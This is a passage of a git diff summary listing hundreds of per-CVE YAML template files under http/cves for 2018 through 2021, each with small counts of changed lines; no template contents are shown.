http/cves/2018/CVE-2018-19877.yaml | 5 +++-- http/cves/2018/CVE-2018-19892.yaml | 5 +++-- http/cves/2018/CVE-2018-19914.yaml | 5 +++-- http/cves/2018/CVE-2018-19915.yaml | 5 +++-- http/cves/2018/CVE-2018-20009.yaml | 5 +++-- http/cves/2018/CVE-2018-20010.yaml | 5 +++-- http/cves/2018/CVE-2018-20011.yaml | 5 +++-- http/cves/2018/CVE-2018-20462.yaml | 5 +++-- http/cves/2018/CVE-2018-20463.yaml | 2 +- http/cves/2018/CVE-2018-20470.yaml | 2 +- http/cves/2018/CVE-2018-20526.yaml | 5 +++-- http/cves/2018/CVE-2018-20608.yaml | 2 +- http/cves/2018/CVE-2018-20824.yaml | 5 +++-- http/cves/2018/CVE-2018-20985.yaml | 5 +++-- http/cves/2018/CVE-2018-2392.yaml | 4 ++-- http/cves/2018/CVE-2018-2791.yaml | 2 +- http/cves/2018/CVE-2018-2894.yaml | 2 +- http/cves/2018/CVE-2018-3167.yaml | 5 +++-- http/cves/2018/CVE-2018-3238.yaml | 2 +- http/cves/2018/CVE-2018-3714.yaml | 5 +++-- http/cves/2018/CVE-2018-3760.yaml | 7 ++++--- http/cves/2018/CVE-2018-3810.yaml | 2 +- http/cves/2018/CVE-2018-5230.yaml | 5 +++-- http/cves/2018/CVE-2018-5233.yaml | 5 +++-- http/cves/2018/CVE-2018-5316.yaml | 5 +++-- http/cves/2018/CVE-2018-5715.yaml | 5 +++-- http/cves/2018/CVE-2018-6184.yaml | 2 +- http/cves/2018/CVE-2018-6200.yaml | 5 +++-- http/cves/2018/CVE-2018-6530.yaml | 2 +- http/cves/2018/CVE-2018-6910.yaml | 2 +- http/cves/2018/CVE-2018-7251.yaml | 2 +- http/cves/2018/CVE-2018-7282.yaml | 2 +- http/cves/2018/CVE-2018-7422.yaml | 2 +- http/cves/2018/CVE-2018-7467.yaml | 2 +- http/cves/2018/CVE-2018-7490.yaml | 2 +- http/cves/2018/CVE-2018-7602.yaml | 3 ++- http/cves/2018/CVE-2018-7653.yaml | 2 +- http/cves/2018/CVE-2018-7662.yaml | 2 +- http/cves/2018/CVE-2018-7700.yaml | 2 +- http/cves/2018/CVE-2018-7719.yaml | 2 +- http/cves/2018/CVE-2018-8006.yaml | 2 +- http/cves/2018/CVE-2018-8033.yaml | 5 +++-- http/cves/2018/CVE-2018-8715.yaml | 5 +++-- http/cves/2018/CVE-2018-8719.yaml | 2 +- http/cves/2018/CVE-2018-8727.yaml | 5 +++-- http/cves/2018/CVE-2018-8770.yaml | 5 +++-- http/cves/2018/CVE-2018-9118.yaml | 3 ++- http/cves/2018/CVE-2018-9161.yaml | 5 +++-- http/cves/2018/CVE-2018-9205.yaml | 5 +++-- http/cves/2018/CVE-2018-9845.yaml | 5 +++-- http/cves/2018/CVE-2018-9995.yaml | 2 +- http/cves/2019/CVE-2019-0193.yaml | 4 ++-- http/cves/2019/CVE-2019-0221.yaml | 2 +- http/cves/2019/CVE-2019-0230.yaml | 2 +- http/cves/2019/CVE-2019-10068.yaml | 2 +- http/cves/2019/CVE-2019-10092.yaml | 2 +- http/cves/2019/CVE-2019-10098.yaml | 2 +- http/cves/2019/CVE-2019-1010287.yaml | 5 +++-- http/cves/2019/CVE-2019-1010290.yaml | 5 +++-- http/cves/2019/CVE-2019-10232.yaml | 5 +++-- http/cves/2019/CVE-2019-10405.yaml | 6 +++--- http/cves/2019/CVE-2019-10475.yaml | 2 +- http/cves/2019/CVE-2019-10717.yaml | 2 +- http/cves/2019/CVE-2019-11013.yaml | 2 +- http/cves/2019/CVE-2019-11248.yaml | 5 +++-- http/cves/2019/CVE-2019-11370.yaml | 5 +++-- http/cves/2019/CVE-2019-11510.yaml | 2 +- http/cves/2019/CVE-2019-11580.yaml | 2 +- http/cves/2019/CVE-2019-11581.yaml | 2 +- http/cves/2019/CVE-2019-11869.yaml | 6 +++--- http/cves/2019/CVE-2019-12276.yaml | 2 +- http/cves/2019/CVE-2019-12314.yaml | 2 +- http/cves/2019/CVE-2019-12461.yaml | 5 +++-- http/cves/2019/CVE-2019-12581.yaml | 5 +++-- http/cves/2019/CVE-2019-12583.yaml | 5 +++-- http/cves/2019/CVE-2019-12593.yaml | 2 +- http/cves/2019/CVE-2019-12616.yaml | 5 +++-- http/cves/2019/CVE-2019-12725.yaml | 2 +- http/cves/2019/CVE-2019-12962.yaml | 5 +++-- http/cves/2019/CVE-2019-12985.yaml | 2 +- http/cves/2019/CVE-2019-12987.yaml | 2 +- http/cves/2019/CVE-2019-12988.yaml | 2 +- http/cves/2019/CVE-2019-13392.yaml | 5 +++-- http/cves/2019/CVE-2019-13396.yaml | 5 +++-- http/cves/2019/CVE-2019-13462.yaml | 2 +- http/cves/2019/CVE-2019-14205.yaml | 2 +- http/cves/2019/CVE-2019-14223.yaml | 5 +++-- http/cves/2019/CVE-2019-14251.yaml | 5 +++-- http/cves/2019/CVE-2019-14312.yaml | 2 +- http/cves/2019/CVE-2019-14322.yaml | 2 +- http/cves/2019/CVE-2019-14470.yaml | 2 +- http/cves/2019/CVE-2019-14530.yaml | 5 +++-- http/cves/2019/CVE-2019-14696.yaml | 5 +++-- http/cves/2019/CVE-2019-14750.yaml | 5 +++-- http/cves/2019/CVE-2019-14789.yaml | 5 +++-- http/cves/2019/CVE-2019-14974.yaml | 5 +++-- http/cves/2019/CVE-2019-15043.yaml | 2 +- http/cves/2019/CVE-2019-15501.yaml | 5 +++-- http/cves/2019/CVE-2019-15642.yaml | 5 +++-- http/cves/2019/CVE-2019-15713.yaml | 5 +++-- http/cves/2019/CVE-2019-15811.yaml | 5 +++-- http/cves/2019/CVE-2019-15829.yaml | 5 +++-- http/cves/2019/CVE-2019-15858.yaml | 2 +- http/cves/2019/CVE-2019-15889.yaml | 3 ++- http/cves/2019/CVE-2019-16057.yaml | 4 ++-- http/cves/2019/CVE-2019-16097.yaml | 2 +- http/cves/2019/CVE-2019-16123.yaml | 2 +- http/cves/2019/CVE-2019-16278.yaml | 4 ++-- http/cves/2019/CVE-2019-16313.yaml | 2 +- http/cves/2019/CVE-2019-16332.yaml | 5 +++-- http/cves/2019/CVE-2019-16525.yaml | 2 +- http/cves/2019/CVE-2019-1653.yaml | 5 +++-- http/cves/2019/CVE-2019-16920.yaml | 2 +- http/cves/2019/CVE-2019-16931.yaml | 5 +++-- http/cves/2019/CVE-2019-16932.yaml | 2 +- http/cves/2019/CVE-2019-16996.yaml | 2 +- http/cves/2019/CVE-2019-16997.yaml | 2 +- http/cves/2019/CVE-2019-17270.yaml | 2 +- http/cves/2019/CVE-2019-17382.yaml | 2 +- http/cves/2019/CVE-2019-17418.yaml | 2 +- http/cves/2019/CVE-2019-17444.yaml | 2 +- http/cves/2019/CVE-2019-17503.yaml | 5 +++-- http/cves/2019/CVE-2019-17538.yaml | 5 +++-- http/cves/2019/CVE-2019-17574.yaml | 2 +- http/cves/2019/CVE-2019-17662.yaml | 2 +- http/cves/2019/CVE-2019-1821.yaml | 5 +++-- http/cves/2019/CVE-2019-18371.yaml | 5 +++-- http/cves/2019/CVE-2019-18393.yaml | 5 +++-- http/cves/2019/CVE-2019-18394.yaml | 2 +- http/cves/2019/CVE-2019-18665.yaml | 4 ++-- http/cves/2019/CVE-2019-18922.yaml | 2 +- http/cves/2019/CVE-2019-18957.yaml | 2 +- http/cves/2019/CVE-2019-1898.yaml | 5 +++-- http/cves/2019/CVE-2019-19134.yaml | 5 +++-- http/cves/2019/CVE-2019-19368.yaml | 2 +- http/cves/2019/CVE-2019-1943.yaml | 2 +- http/cves/2019/CVE-2019-19824.yaml | 2 +- http/cves/2019/CVE-2019-19908.yaml | 5 +++-- http/cves/2019/CVE-2019-20085.yaml | 2 +- http/cves/2019/CVE-2019-20141.yaml | 5 +++-- http/cves/2019/CVE-2019-20183.yaml | 5 +++-- http/cves/2019/CVE-2019-20210.yaml | 5 +++-- http/cves/2019/CVE-2019-20224.yaml | 5 +++-- http/cves/2019/CVE-2019-20933.yaml | 5 +++-- http/cves/2019/CVE-2019-2578.yaml | 2 +- http/cves/2019/CVE-2019-2579.yaml | 6 +++--- http/cves/2019/CVE-2019-2588.yaml | 5 +++-- http/cves/2019/CVE-2019-2616.yaml | 2 +- http/cves/2019/CVE-2019-2729.yaml | 3 ++- http/cves/2019/CVE-2019-2767.yaml | 2 +- http/cves/2019/CVE-2019-3398.yaml | 5 +++-- http/cves/2019/CVE-2019-3401.yaml | 4 ++-- http/cves/2019/CVE-2019-3402.yaml | 5 +++-- http/cves/2019/CVE-2019-3403.yaml | 5 +++-- http/cves/2019/CVE-2019-3799.yaml | 2 +- http/cves/2019/CVE-2019-3911.yaml | 5 +++-- http/cves/2019/CVE-2019-3912.yaml | 5 +++-- http/cves/2019/CVE-2019-3929.yaml | 2 +- http/cves/2019/CVE-2019-5127.yaml | 2 +- http/cves/2019/CVE-2019-5434.yaml | 2 +- http/cves/2019/CVE-2019-6112.yaml | 5 +++-- http/cves/2019/CVE-2019-6715.yaml | 2 +- http/cves/2019/CVE-2019-6799.yaml | 2 +- http/cves/2019/CVE-2019-6802.yaml | 5 +++-- http/cves/2019/CVE-2019-7192.yaml | 6 +++--- http/cves/2019/CVE-2019-7219.yaml | 5 +++-- http/cves/2019/CVE-2019-7238.yaml | 2 +- http/cves/2019/CVE-2019-7254.yaml | 2 +- http/cves/2019/CVE-2019-7255.yaml | 5 +++-- http/cves/2019/CVE-2019-7256.yaml | 2 +- http/cves/2019/CVE-2019-7275.yaml | 5 +++-- http/cves/2019/CVE-2019-7315.yaml | 2 +- http/cves/2019/CVE-2019-7481.yaml | 2 +- http/cves/2019/CVE-2019-7543.yaml | 5 +++-- http/cves/2019/CVE-2019-8390.yaml | 6 +++--- http/cves/2019/CVE-2019-8442.yaml | 2 +- http/cves/2019/CVE-2019-8446.yaml | 2 +- http/cves/2019/CVE-2019-8449.yaml | 2 +- http/cves/2019/CVE-2019-8903.yaml | 2 +- http/cves/2019/CVE-2019-8937.yaml | 2 +- http/cves/2019/CVE-2019-8982.yaml | 5 +++-- http/cves/2019/CVE-2019-9041.yaml | 4 ++-- http/cves/2019/CVE-2019-9618.yaml | 2 +- http/cves/2019/CVE-2019-9726.yaml | 2 +- http/cves/2019/CVE-2019-9733.yaml | 2 +- http/cves/2019/CVE-2019-9915.yaml | 5 +++-- http/cves/2019/CVE-2019-9922.yaml | 4 ++-- http/cves/2019/CVE-2019-9955.yaml | 2 +- http/cves/2019/CVE-2019-9978.yaml | 2 +- http/cves/2020/CVE-2020-10148.yaml | 7 ++++--- http/cves/2020/CVE-2020-10199.yaml | 5 +++-- http/cves/2020/CVE-2020-10220.yaml | 2 +- http/cves/2020/CVE-2020-10546.yaml | 4 ++-- http/cves/2020/CVE-2020-10547.yaml | 4 ++-- http/cves/2020/CVE-2020-10548.yaml | 4 ++-- http/cves/2020/CVE-2020-10549.yaml | 4 ++-- http/cves/2020/CVE-2020-10973.yaml | 2 +- http/cves/2020/CVE-2020-11034.yaml | 5 +++-- http/cves/2020/CVE-2020-11110.yaml | 5 +++-- http/cves/2020/CVE-2020-11450.yaml | 2 +- http/cves/2020/CVE-2020-11455.yaml | 2 +- http/cves/2020/CVE-2020-11529.yaml | 5 +++-- http/cves/2020/CVE-2020-11530.yaml | 5 +++-- http/cves/2020/CVE-2020-11546.yaml | 2 +- http/cves/2020/CVE-2020-11547.yaml | 5 +++-- http/cves/2020/CVE-2020-11710.yaml | 5 +++-- http/cves/2020/CVE-2020-11798.yaml | 5 +++-- http/cves/2020/CVE-2020-11853.yaml | 2 +- http/cves/2020/CVE-2020-11854.yaml | 2 +- http/cves/2020/CVE-2020-11930.yaml | 2 +- http/cves/2020/CVE-2020-11978.yaml | 6 +++--- http/cves/2020/CVE-2020-11991.yaml | 5 +++-- http/cves/2020/CVE-2020-12054.yaml | 5 +++-- http/cves/2020/CVE-2020-12116.yaml | 5 +++-- http/cves/2020/CVE-2020-12127.yaml | 2 +- http/cves/2020/CVE-2020-12256.yaml | 5 +++-- http/cves/2020/CVE-2020-12259.yaml | 5 +++-- http/cves/2020/CVE-2020-12447.yaml | 5 +++-- http/cves/2020/CVE-2020-12478.yaml | 2 +- http/cves/2020/CVE-2020-12800.yaml | 4 ++-- http/cves/2020/CVE-2020-13117.yaml | 2 +- http/cves/2020/CVE-2020-13121.yaml | 5 +++-- http/cves/2020/CVE-2020-13158.yaml | 4 ++-- http/cves/2020/CVE-2020-13167.yaml | 2 +- http/cves/2020/CVE-2020-13258.yaml | 2 +- http/cves/2020/CVE-2020-13379.yaml | 2 +- http/cves/2020/CVE-2020-13405.yaml | 5 +++-- http/cves/2020/CVE-2020-13483.yaml | 5 +++-- http/cves/2020/CVE-2020-13638.yaml | 3 ++- http/cves/2020/CVE-2020-13700.yaml | 2 +- http/cves/2020/CVE-2020-13820.yaml | 5 +++-- http/cves/2020/CVE-2020-13851.yaml | 2 +- http/cves/2020/CVE-2020-13927.yaml | 2 +- http/cves/2020/CVE-2020-13937.yaml | 2 +- http/cves/2020/CVE-2020-13942.yaml | 2 +- http/cves/2020/CVE-2020-13945.yaml | 5 +++-- http/cves/2020/CVE-2020-14092.yaml | 2 +- http/cves/2020/CVE-2020-14144.yaml | 4 ++-- http/cves/2020/CVE-2020-14179.yaml | 2 +- http/cves/2020/CVE-2020-14181.yaml | 2 +- http/cves/2020/CVE-2020-14408.yaml | 5 +++-- http/cves/2020/CVE-2020-14413.yaml | 2 +- http/cves/2020/CVE-2020-14864.yaml | 8 ++++---- http/cves/2020/CVE-2020-14882.yaml | 4 ++-- http/cves/2020/CVE-2020-14883.yaml | 2 +- http/cves/2020/CVE-2020-15050.yaml | 2 +- http/cves/2020/CVE-2020-15129.yaml | 5 +++-- http/cves/2020/CVE-2020-15148.yaml | 3 ++- http/cves/2020/CVE-2020-15227.yaml | 5 +++-- http/cves/2020/CVE-2020-15500.yaml | 5 +++-- http/cves/2020/CVE-2020-15867.yaml | 6 +++--- http/cves/2020/CVE-2020-15895.yaml | 5 +++-- http/cves/2020/CVE-2020-16139.yaml | 2 +- http/cves/2020/CVE-2020-16846.yaml | 2 +- http/cves/2020/CVE-2020-16952.yaml | 3 ++- http/cves/2020/CVE-2020-17362.yaml | 5 +++-- http/cves/2020/CVE-2020-17453.yaml | 2 +- http/cves/2020/CVE-2020-17456.yaml | 6 +++--- http/cves/2020/CVE-2020-17463.yaml | 5 +++-- http/cves/2020/CVE-2020-17505.yaml | 6 +++--- http/cves/2020/CVE-2020-17506.yaml | 2 +- http/cves/2020/CVE-2020-17518.yaml | 2 +- http/cves/2020/CVE-2020-17526.yaml | 4 ++-- http/cves/2020/CVE-2020-17530.yaml | 2 +- http/cves/2020/CVE-2020-19282.yaml | 5 +++-- http/cves/2020/CVE-2020-19283.yaml | 5 +++-- http/cves/2020/CVE-2020-19295.yaml | 5 +++-- http/cves/2020/CVE-2020-19360.yaml | 2 +- http/cves/2020/CVE-2020-1943.yaml | 2 +- http/cves/2020/CVE-2020-19515.yaml | 5 +++-- http/cves/2020/CVE-2020-1956.yaml | 6 +++--- http/cves/2020/CVE-2020-19625.yaml | 2 +- http/cves/2020/CVE-2020-20285.yaml | 5 +++-- http/cves/2020/CVE-2020-20300.yaml | 5 +++-- http/cves/2020/CVE-2020-2036.yaml | 2 +- http/cves/2020/CVE-2020-2096.yaml | 2 +- http/cves/2020/CVE-2020-20982.yaml | 2 +- http/cves/2020/CVE-2020-20988.yaml | 5 +++-- http/cves/2020/CVE-2020-21012.yaml | 4 ++-- http/cves/2020/CVE-2020-2103.yaml | 6 +++--- http/cves/2020/CVE-2020-21224.yaml | 2 +- http/cves/2020/CVE-2020-2140.yaml | 5 +++-- http/cves/2020/CVE-2020-22840.yaml | 2 +- http/cves/2020/CVE-2020-23015.yaml | 5 +++-- http/cves/2020/CVE-2020-23517.yaml | 5 +++-- http/cves/2020/CVE-2020-23575.yaml | 5 +++-- http/cves/2020/CVE-2020-23697.yaml | 5 +++-- http/cves/2020/CVE-2020-23972.yaml | 2 +- http/cves/2020/CVE-2020-24186.yaml | 4 ++-- http/cves/2020/CVE-2020-24223.yaml | 5 +++-- http/cves/2020/CVE-2020-24312.yaml | 2 +- http/cves/2020/CVE-2020-24391.yaml | 6 +++--- http/cves/2020/CVE-2020-24550.yaml | 5 +++-- http/cves/2020/CVE-2020-24571.yaml | 2 +- http/cves/2020/CVE-2020-24579.yaml | 2 +- http/cves/2020/CVE-2020-24589.yaml | 4 ++-- http/cves/2020/CVE-2020-24701.yaml | 5 +++-- http/cves/2020/CVE-2020-24902.yaml | 5 +++-- http/cves/2020/CVE-2020-24903.yaml | 5 +++-- http/cves/2020/CVE-2020-24912.yaml | 5 +++-- http/cves/2020/CVE-2020-24949.yaml | 2 +- http/cves/2020/CVE-2020-25078.yaml | 2 +- http/cves/2020/CVE-2020-25223.yaml | 4 ++-- http/cves/2020/CVE-2020-25495.yaml | 5 +++-- http/cves/2020/CVE-2020-25506.yaml | 2 +- http/cves/2020/CVE-2020-25540.yaml | 2 +- http/cves/2020/CVE-2020-25780.yaml | 5 +++-- http/cves/2020/CVE-2020-25864.yaml | 8 ++++---- http/cves/2020/CVE-2020-26153.yaml | 5 +++-- http/cves/2020/CVE-2020-26214.yaml | 2 +- http/cves/2020/CVE-2020-26217.yaml | 2 +- http/cves/2020/CVE-2020-26248.yaml | 5 +++-- http/cves/2020/CVE-2020-26258.yaml | 2 +- http/cves/2020/CVE-2020-26413.yaml | 2 +- http/cves/2020/CVE-2020-26876.yaml | 7 ++++--- http/cves/2020/CVE-2020-26919.yaml | 4 ++-- http/cves/2020/CVE-2020-26948.yaml | 2 +- http/cves/2020/CVE-2020-27191.yaml | 5 +++-- http/cves/2020/CVE-2020-27361.yaml | 2 +- http/cves/2020/CVE-2020-27467.yaml | 2 +- http/cves/2020/CVE-2020-27481.yaml | 2 +- http/cves/2020/CVE-2020-27735.yaml | 5 +++-- http/cves/2020/CVE-2020-27866.yaml | 7 ++++--- http/cves/2020/CVE-2020-27982.yaml | 5 +++-- http/cves/2020/CVE-2020-27986.yaml | 2 +- http/cves/2020/CVE-2020-28185.yaml | 6 +++--- http/cves/2020/CVE-2020-28208.yaml | 5 +++-- http/cves/2020/CVE-2020-28351.yaml | 2 +- http/cves/2020/CVE-2020-28871.yaml | 2 +- http/cves/2020/CVE-2020-28976.yaml | 5 +++-- http/cves/2020/CVE-2020-29164.yaml | 5 +++-- http/cves/2020/CVE-2020-29227.yaml | 5 +++-- http/cves/2020/CVE-2020-29284.yaml | 5 +++-- http/cves/2020/CVE-2020-29395.yaml | 2 +- http/cves/2020/CVE-2020-29453.yaml | 2 +- http/cves/2020/CVE-2020-29583.yaml | 6 +++--- http/cves/2020/CVE-2020-29597.yaml | 6 +++--- http/cves/2020/CVE-2020-3187.yaml | 2 +- http/cves/2020/CVE-2020-3452.yaml | 4 ++-- http/cves/2020/CVE-2020-35476.yaml | 2 +- http/cves/2020/CVE-2020-35489.yaml | 2 +- http/cves/2020/CVE-2020-35580.yaml | 2 +- http/cves/2020/CVE-2020-35598.yaml | 2 +- http/cves/2020/CVE-2020-35729.yaml | 2 +- http/cves/2020/CVE-2020-35736.yaml | 2 +- http/cves/2020/CVE-2020-35749.yaml | 6 +++--- http/cves/2020/CVE-2020-3580.yaml | 2 +- http/cves/2020/CVE-2020-35846.yaml | 2 +- http/cves/2020/CVE-2020-35847.yaml | 2 +- http/cves/2020/CVE-2020-35848.yaml | 2 +- http/cves/2020/CVE-2020-35951.yaml | 6 +++--- http/cves/2020/CVE-2020-35984.yaml | 5 +++-- http/cves/2020/CVE-2020-35985.yaml | 5 +++-- http/cves/2020/CVE-2020-35986.yaml | 5 +++-- http/cves/2020/CVE-2020-35987.yaml | 5 +++-- http/cves/2020/CVE-2020-36112.yaml | 2 +- http/cves/2020/CVE-2020-36289.yaml | 2 +- http/cves/2020/CVE-2020-36365.yaml | 5 +++-- http/cves/2020/CVE-2020-36510.yaml | 5 +++-- http/cves/2020/CVE-2020-4463.yaml | 2 +- http/cves/2020/CVE-2020-5191.yaml | 5 +++-- http/cves/2020/CVE-2020-5192.yaml | 5 +++-- http/cves/2020/CVE-2020-5284.yaml | 5 +++-- http/cves/2020/CVE-2020-5307.yaml | 2 +- http/cves/2020/CVE-2020-5405.yaml | 5 +++-- http/cves/2020/CVE-2020-5410.yaml | 2 +- http/cves/2020/CVE-2020-5412.yaml | 8 ++++---- http/cves/2020/CVE-2020-5775.yaml | 5 +++-- http/cves/2020/CVE-2020-5776.yaml | 2 +- http/cves/2020/CVE-2020-5777.yaml | 2 +- http/cves/2020/CVE-2020-5847.yaml | 2 +- http/cves/2020/CVE-2020-6171.yaml | 5 +++-- http/cves/2020/CVE-2020-6207.yaml | 4 ++-- http/cves/2020/CVE-2020-6287.yaml | 2 +- http/cves/2020/CVE-2020-6308.yaml | 5 +++-- http/cves/2020/CVE-2020-6637.yaml | 2 +- http/cves/2020/CVE-2020-6950.yaml | 2 +- http/cves/2020/CVE-2020-7107.yaml | 5 +++-- http/cves/2020/CVE-2020-7136.yaml | 2 +- http/cves/2020/CVE-2020-7318.yaml | 5 +++-- http/cves/2020/CVE-2020-7943.yaml | 2 +- http/cves/2020/CVE-2020-7961.yaml | 2 +- http/cves/2020/CVE-2020-7980.yaml | 2 +- http/cves/2020/CVE-2020-8115.yaml | 2 +- http/cves/2020/CVE-2020-8163.yaml | 2 +- http/cves/2020/CVE-2020-8191.yaml | 5 +++-- http/cves/2020/CVE-2020-8193.yaml | 5 +++-- http/cves/2020/CVE-2020-8194.yaml | 2 +- http/cves/2020/CVE-2020-8497.yaml | 5 +++-- http/cves/2020/CVE-2020-8512.yaml | 2 +- http/cves/2020/CVE-2020-8515.yaml | 2 +- http/cves/2020/CVE-2020-8615.yaml | 5 +++-- http/cves/2020/CVE-2020-8641.yaml | 7 ++++--- http/cves/2020/CVE-2020-8644.yaml | 7 ++++--- http/cves/2020/CVE-2020-8654.yaml | 4 ++-- http/cves/2020/CVE-2020-8771.yaml | 6 +++--- http/cves/2020/CVE-2020-8772.yaml | 2 +- http/cves/2020/CVE-2020-8813.yaml | 2 +- http/cves/2020/CVE-2020-8982.yaml | 2 +- http/cves/2020/CVE-2020-9036.yaml | 5 +++-- http/cves/2020/CVE-2020-9043.yaml | 5 +++-- http/cves/2020/CVE-2020-9047.yaml | 5 +++-- http/cves/2020/CVE-2020-9054.yaml | 2 +- http/cves/2020/CVE-2020-9315.yaml | 2 +- http/cves/2020/CVE-2020-9344.yaml | 5 +++-- http/cves/2020/CVE-2020-9402.yaml | 2 +- http/cves/2020/CVE-2020-9425.yaml | 5 +++-- http/cves/2020/CVE-2020-9483.yaml | 2 +- http/cves/2020/CVE-2020-9496.yaml | 2 +- http/cves/2020/CVE-2020-9757.yaml | 2 +- http/cves/2021/CVE-2021-1472.yaml | 2 +- http/cves/2021/CVE-2021-1499.yaml | 2 +- http/cves/2021/CVE-2021-20031.yaml | 5 +++-- http/cves/2021/CVE-2021-20038.yaml | 7 ++++--- http/cves/2021/CVE-2021-20090.yaml | 2 +- http/cves/2021/CVE-2021-20091.yaml | 5 +++-- http/cves/2021/CVE-2021-20092.yaml | 5 +++-- http/cves/2021/CVE-2021-20114.yaml | 2 +- http/cves/2021/CVE-2021-20123.yaml | 4 ++-- http/cves/2021/CVE-2021-20124.yaml | 7 ++++--- http/cves/2021/CVE-2021-20137.yaml | 2 +- http/cves/2021/CVE-2021-20150.yaml | 2 +- http/cves/2021/CVE-2021-20158.yaml | 2 +- http/cves/2021/CVE-2021-20167.yaml | 2 +- http/cves/2021/CVE-2021-20323.yaml | 5 +++-- http/cves/2021/CVE-2021-20792.yaml | 6 +++--- http/cves/2021/CVE-2021-20837.yaml | 2 +- http/cves/2021/CVE-2021-21087.yaml | 3 ++- http/cves/2021/CVE-2021-21234.yaml | 2 +- http/cves/2021/CVE-2021-21307.yaml | 4 ++-- http/cves/2021/CVE-2021-21311.yaml | 5 +++-- http/cves/2021/CVE-2021-21315.yaml | 2 +- http/cves/2021/CVE-2021-21345.yaml | 9 +++++---- http/cves/2021/CVE-2021-21351.yaml | 2 +- http/cves/2021/CVE-2021-21389.yaml | 2 +- http/cves/2021/CVE-2021-21402.yaml | 4 ++-- http/cves/2021/CVE-2021-21479.yaml | 5 +++-- http/cves/2021/CVE-2021-21799.yaml | 2 +- http/cves/2021/CVE-2021-21800.yaml | 2 +- http/cves/2021/CVE-2021-21801.yaml | 2 +- http/cves/2021/CVE-2021-21802.yaml | 2 +- http/cves/2021/CVE-2021-21803.yaml | 2 +- http/cves/2021/CVE-2021-21805.yaml | 2 +- http/cves/2021/CVE-2021-21816.yaml | 5 +++-- http/cves/2021/CVE-2021-21881.yaml | 2 +- http/cves/2021/CVE-2021-21973.yaml | 5 +++-- http/cves/2021/CVE-2021-21975.yaml | 2 +- http/cves/2021/CVE-2021-21978.yaml | 2 +- http/cves/2021/CVE-2021-21985.yaml | 2 +- http/cves/2021/CVE-2021-22005.yaml | 5 +++-- http/cves/2021/CVE-2021-22054.yaml | 2 +- http/cves/2021/CVE-2021-22122.yaml | 5 +++-- http/cves/2021/CVE-2021-22145.yaml | 2 +- http/cves/2021/CVE-2021-22205.yaml | 2 +- http/cves/2021/CVE-2021-22214.yaml | 2 +- http/cves/2021/CVE-2021-22502.yaml | 2 +- http/cves/2021/CVE-2021-22707.yaml | 5 +++-- http/cves/2021/CVE-2021-22873.yaml | 5 +++-- http/cves/2021/CVE-2021-22911.yaml | 4 ++-- http/cves/2021/CVE-2021-23241.yaml | 5 +++-- http/cves/2021/CVE-2021-24145.yaml | 6 +++--- http/cves/2021/CVE-2021-24150.yaml | 4 ++-- http/cves/2021/CVE-2021-24155.yaml | 4 ++-- http/cves/2021/CVE-2021-24165.yaml | 5 +++-- http/cves/2021/CVE-2021-24169.yaml | 5 +++-- http/cves/2021/CVE-2021-24176.yaml | 5 +++-- http/cves/2021/CVE-2021-24210.yaml | 5 +++-- http/cves/2021/CVE-2021-24214.yaml | 5 +++-- http/cves/2021/CVE-2021-24215.yaml | 5 +++-- http/cves/2021/CVE-2021-24226.yaml | 2 +- http/cves/2021/CVE-2021-24227.yaml | 2 +- http/cves/2021/CVE-2021-24235.yaml | 5 +++-- http/cves/2021/CVE-2021-24236.yaml | 5 +++-- http/cves/2021/CVE-2021-24237.yaml | 5 +++-- http/cves/2021/CVE-2021-24239.yaml | 5 +++-- http/cves/2021/CVE-2021-24245.yaml | 5 +++-- http/cves/2021/CVE-2021-24274.yaml | 5 +++-- http/cves/2021/CVE-2021-24275.yaml | 5 +++-- http/cves/2021/CVE-2021-24276.yaml | 5 +++-- http/cves/2021/CVE-2021-24278.yaml | 2 +- http/cves/2021/CVE-2021-24284.yaml | 6 +++--- http/cves/2021/CVE-2021-24285.yaml | 2 +- http/cves/2021/CVE-2021-24286.yaml | 5 +++-- http/cves/2021/CVE-2021-24287.yaml | 5 +++-- http/cves/2021/CVE-2021-24288.yaml | 5 +++-- http/cves/2021/CVE-2021-24291.yaml | 5 +++-- http/cves/2021/CVE-2021-24298.yaml | 5 +++-- http/cves/2021/CVE-2021-24300.yaml | 6 +++--- http/cves/2021/CVE-2021-24316.yaml | 5 +++-- http/cves/2021/CVE-2021-24320.yaml | 5 +++-- http/cves/2021/CVE-2021-24335.yaml | 5 +++-- http/cves/2021/CVE-2021-24340.yaml | 2 +- http/cves/2021/CVE-2021-24342.yaml | 5 +++-- http/cves/2021/CVE-2021-24347.yaml | 6 +++--- http/cves/2021/CVE-2021-24351.yaml | 5 +++-- http/cves/2021/CVE-2021-24358.yaml | 5 +++-- http/cves/2021/CVE-2021-24364.yaml | 5 +++-- http/cves/2021/CVE-2021-24387.yaml | 5 +++-- http/cves/2021/CVE-2021-24389.yaml | 5 +++-- http/cves/2021/CVE-2021-24406.yaml | 5 +++-- http/cves/2021/CVE-2021-24407.yaml | 5 +++-- http/cves/2021/CVE-2021-24409.yaml | 5 +++-- http/cves/2021/CVE-2021-24435.yaml | 5 +++-- http/cves/2021/CVE-2021-24436.yaml | 5 +++-- http/cves/2021/CVE-2021-24452.yaml | 5 +++-- http/cves/2021/CVE-2021-24472.yaml | 2 +- http/cves/2021/CVE-2021-24488.yaml | 6 +++--- http/cves/2021/CVE-2021-24495.yaml | 5 +++-- http/cves/2021/CVE-2021-24498.yaml | 5 +++-- http/cves/2021/CVE-2021-24499.yaml | 2 +- http/cves/2021/CVE-2021-24510.yaml | 6 +++--- http/cves/2021/CVE-2021-24554.yaml | 5 +++-- http/cves/2021/CVE-2021-24627.yaml | 6 +++--- http/cves/2021/CVE-2021-24647.yaml | 5 +++-- http/cves/2021/CVE-2021-24666.yaml | 2 +- http/cves/2021/CVE-2021-24731.yaml | 2 +- http/cves/2021/CVE-2021-24746.yaml | 5 +++-- http/cves/2021/CVE-2021-24750.yaml | 6 +++--- http/cves/2021/CVE-2021-24762.yaml | 2 +- http/cves/2021/CVE-2021-24791.yaml | 5 +++-- http/cves/2021/CVE-2021-24827.yaml | 2 +- http/cves/2021/CVE-2021-24838.yaml | 5 +++-- http/cves/2021/CVE-2021-24862.yaml | 5 +++-- http/cves/2021/CVE-2021-24875.yaml | 5 +++-- http/cves/2021/CVE-2021-24891.yaml | 6 +++--- http/cves/2021/CVE-2021-24910.yaml | 5 +++-- http/cves/2021/CVE-2021-24915.yaml | 7 ++++--- http/cves/2021/CVE-2021-24917.yaml | 2 +- http/cves/2021/CVE-2021-24926.yaml | 6 +++--- http/cves/2021/CVE-2021-24931.yaml | 2 +- http/cves/2021/CVE-2021-24940.yaml | 5 +++-- http/cves/2021/CVE-2021-24946.yaml | 2 +- http/cves/2021/CVE-2021-24956.yaml | 6 +++--- 